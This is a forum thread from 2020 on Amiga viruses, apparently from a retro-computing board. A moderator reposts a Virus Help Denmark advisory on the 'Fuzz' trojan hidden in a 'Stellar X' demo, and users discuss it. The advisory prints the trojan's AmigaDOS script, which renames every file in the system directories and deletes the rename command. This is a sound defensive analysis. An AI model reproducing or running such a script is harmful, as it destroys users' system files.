12 April 2020, 01:06 | #1 |
Moderator
Join Date: Jun 2009
Location: France
Age: 46
Posts: 1,982
|
Amiga Virus Warnings
This message to share with you a very recent trojan alert :
Code:
------------------------ Amiga Virus Encyclopedia Fuzz Trojan Fuzz Trojan is unknown to all Anti-Virus programs. TAKE CARE ------------------------------------------------------------ ........................ VIRUS HELP DENMARK ...................... Hi All.... 11 april 2020 We have just recived this archive. It is said to be a demo for ECS & AGA machines. But if you run this demo, your Amiga system will in C:, S:, Devs:, L; Libs:, will be renamed We are not really sure how old this trojan are but at this time there is NO ANTIVIRUS program that can find it. So watch out for it. Here is some info about the trojan: ------------------------------------------------------ Trojan name... : Fuzz Trojan file... : Many files do damage Trojan size... : Many files Trojan archive : Stellarx.lha Archive size.. : 444.898 bytes Archive info.. : 'Stellar X' Demo - ECS & AGA Machines ------------------------------------------------------ There is an ReadMe.txt in the archive, with an add from a Canadian BBS, called 'Peace Courier Canadian HQ', saying use a 14.4 USR Dual modem. So we guess it must be an old trojan, there aint many BBS'es left The trojan bomb is named 'Stellar X Demo'. When you start the Demo, it looks like this: Yo! Fuk-Dat-Boyee... UpTheAss Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger! navel creditz The FuZZ trojan archive contains many other files: BooYaKa = Script-File BooYaka.info = Icon ReadMe.txt = BBS add DATA/Boyee = Rename-Command DATA/Yo! = Run-Command DATA/Fuk-Dat-Boyee... = CLI Show-Command (Picture-Shower) DATA/navel = Execute-Command DATA/Fuk-Diz-Boyee... = Noiseplayer (Module-Player) DATA/Wigger! = Soundmodule DATA/fuzzy = List-Command DATA/creditz = Script-File DATA/Dude = Dir-Command DATA/BooYaKa = Script-File DATA/UpTheAss = Picture If you start the trojan, it executes the Script-File 'BooYaKa': Where you can read this in the script: cd data execute booyaka This means that the trojan will execute the file 'DATA/BooYaKa'. This file contains: Yo! Fuk-Dat-Boyee... UpTheAss Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger! navel creditz Now the trojan displays the picture 'UpTheAss'. Then the module Wigger!. And executes the script-file creditz: fuzzy >rank s: lformat "boyee %s%s s:%s.FuZZ" navel rank fuzzy >rank devs: lformat "boyee %s%s devs:%s.FuZZ" navel rank fuzzy >rank libs: lformat "boyee %s%s libs:%s.FuZZ" navel rank fuzzy >rank l: lformat "boyee %s%s l:%s.FuZZ" navel rank fuzzy >rank fonts: lformat "boyee %s%s fonts:%s.FuZZ" navel rank fuzzy >rank c: lformat "boyee %s%s c:%s.FuZZ" navel rank delete c:rename Now the trojan will rename every file in: S: C: Fonts: Libs: L: Devs: And deletes the command c:rename Fuzz Trojan is unknown to all Anti-Virus programs. TAKE CARE Regards.... __ Jan Andersen __ /// ------------ \\\/// Virus Help Denmark \XX/ www.vht-dk.dk |
12 April 2020, 12:33 | #2 |
Registered User
|
Thx for the info !
|
12 April 2020, 13:50 | #3 |
Registered User
Join Date: Feb 2020
Location: Finland
Posts: 129
|
As the original message is more of an announcement than a question, I dare to write a few lines about viruses here.
I've been wondering, do you people still find viruses in your Amiga systems? I remember back in the day when we used to get games the_way_we_did, demo- and utils disc etc, at least I found a lot of them. Very ofter after trying for example a few games and booting from HD after that, VirusX told me that something (mostly Lamer Exterminator) was found in the memory. Today we get all our 'warez' online in ADF format, and one would think they are the exact same discs than 30 years ago but during my retrosessions over the years I can't remember a single issue with viruses. Were my friends just careless (well, most likely, I was the only one doing also other things than only gaming) or is the retroscene so aware of things that stuff has been cleaned before distributing or what is the case? |
12 April 2020, 14:19 | #4 |
Registered User
Join Date: May 2017
Location: Munich/Bavaria
Posts: 2,294
|
how can it delete "rename" after it renamed everything in c: ?
|
12 April 2020, 14:28 | #5 |
Computer Wizard
Join Date: Aug 2007
Location: Ramberg/Norway
Posts: 928
|
It can do that if the "Rename" command is resident in memory.
|
12 April 2020, 14:39 | #6 |
Moderator
Join Date: Jun 2009
Location: France
Age: 46
Posts: 1,982
|
@PDrill
We are more informed today than we were back then and, more importantly, the mode of distribution has changed. Before, there was a lot of hand-to-hand exchange and that favoured the spread of viruses. Today, we have access to the same sources and in case of contamination, we warn the author to correct the problem at the root (example : Cetro del Sol). @Gorf This line seems misplaced as it should delete "Rename" before changing the names in folder C: You can be malicious and stupid! |
12 April 2020, 15:07 | #7 |
Registered User
Join Date: May 2017
Location: Munich/Bavaria
Posts: 2,294
|
|
12 April 2020, 15:14 | #8 |
Computer Wizard
Join Date: Aug 2007
Location: Ramberg/Norway
Posts: 928
|
Have you never heard of a OS that have the commands resident in memory?
|
12 April 2020, 15:32 | #9 |
Registered User
Join Date: May 2017
Location: Munich/Bavaria
Posts: 2,294
|
|
12 April 2020, 16:24 | #10 |
Registered User
Join Date: Oct 2009
Location: Germany
Posts: 3,303
|
The last line (delete c:rename) in the script shouldn't work, because of renaming everything in C: first.
|
12 April 2020, 16:46 | #11 |
Zone Friend
|
if the scripts isnt run or executed then the trojan doesnt run.. so delete the file creditz which is the script which does the renaming or is that just to simple..
or replace the creditz file/script with a blank 0byte file called creditz. or better yet just get the whole file deleted from wherever its uploaded. |
12 April 2020, 17:06 | #12 | |
Registered User
Join Date: Jan 2002
Location: Germany
Posts: 6,987
|
Quote:
People are indeed careless. As a result every now and then a thread pops up complaining the the Amiga / Harddrive / HDF / Emulation does not boot any more or strange things happen. After investigation it turns out as an infection with a known virus. Some even infect their entire floppy collection with a boot virus, just because they don't enable the write protection. |
|
12 April 2020, 17:16 | #13 |
Moderator
Join Date: Jun 2009
Location: France
Age: 46
Posts: 1,982
|
@andy2004
yes, to avoid the malicious code, just delete the line "navel creditz" of "DATA/BooYaKa" but you would do it because you know there is a problem with this archive.. I found 3 different warez sources for this archive and I didn't search too much. For me the biggest problem in there is that no antivirus detects this script... |
12 April 2020, 21:25 | #14 | |
Registered User
Join Date: Aug 2014
Location: Brindisi (Italy)
Age: 70
Posts: 8,248
|
Quote:
-> Navel (camouflaged file is basically the old "Execute" from 1991) -> fuzzy (this is also a camouflaged file is the 1991 "List" command) -> boyee (another camouflage is the 1991 "Rename" command) Last edited by AMIGASYSTEM; 13 April 2020 at 01:19. |
|
12 April 2020, 23:11 | #15 |
Zone Friend
|
I would delete the line except for 1 thing.. i dont do DEMOS, never have in all the years i had an amiga.. didn't have a hdd either in my a600, and memory would have been cleaned at every reboot after inserting a new disk. Yes i looked at disc mags, games, but mainly apps.
|
13 April 2020, 02:03 | #16 |
Moderator
Join Date: Jun 2009
Location: France
Age: 46
Posts: 1,982
|
Here is my list of bootblocks viruses with the detection (or not!) by the library on which the latest antivirus is based : xvs.library v33.42
Stay safe... |
13 April 2020, 11:37 | #17 |
Phone Homer
Join Date: Jun 2006
Location: 5150
Posts: 5,773
|
If you worked your way through BBS collections you probably would get a virus.
|
13 April 2020, 20:32 | #18 |
Registered User
Join Date: Feb 2007
Location: Melbourne, Australia
Age: 41
Posts: 3,773
|
|
13 April 2020, 22:59 | #19 |
Registered User
Join Date: Mar 2004
Location: finland
Posts: 1,838
|
Keep pressed 10 seconds.
|
14 April 2020, 02:37 | #20 |
Registered User
Join Date: Aug 2016
Location: Earth
Posts: 884
|
Mostly I wasn't into demos either, except for games. Once extracted..I'd check the contents. Then I see rap slang or "irritated" stuff, I'd delete. But then I enjoyed checking scripts too, I checked all stuff I download..at least once. Unless I knew the source is good. Most people I knew checked stuff. But still kept VirusZ and others handy. Rarely did anything get through..."our firewall", haha.
Thanks for the tip! |
Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
Thread Tools | |
Similar Threads | ||||
Thread | Thread Starter | Forum | Replies | Last Post |
vasm treat warnings as errors? | hop | Coders. Asm / Hardware | 3 | 30 April 2019 22:32 |
Warnings after uploading in The Zone! | eLowar | project.EAB | 12 | 12 October 2007 23:10 |
When's the last time you had a virus on your Amiga? | Paul_s | Nostalgia & memories | 21 | 31 January 2007 11:06 |
Virus on my Amiga Disks | Andrew | request.Apps | 14 | 12 December 2004 19:18 |
Amiga Virus Help | madduck | Amiga websites reviews | 1 | 11 September 2002 19:15 |
|
|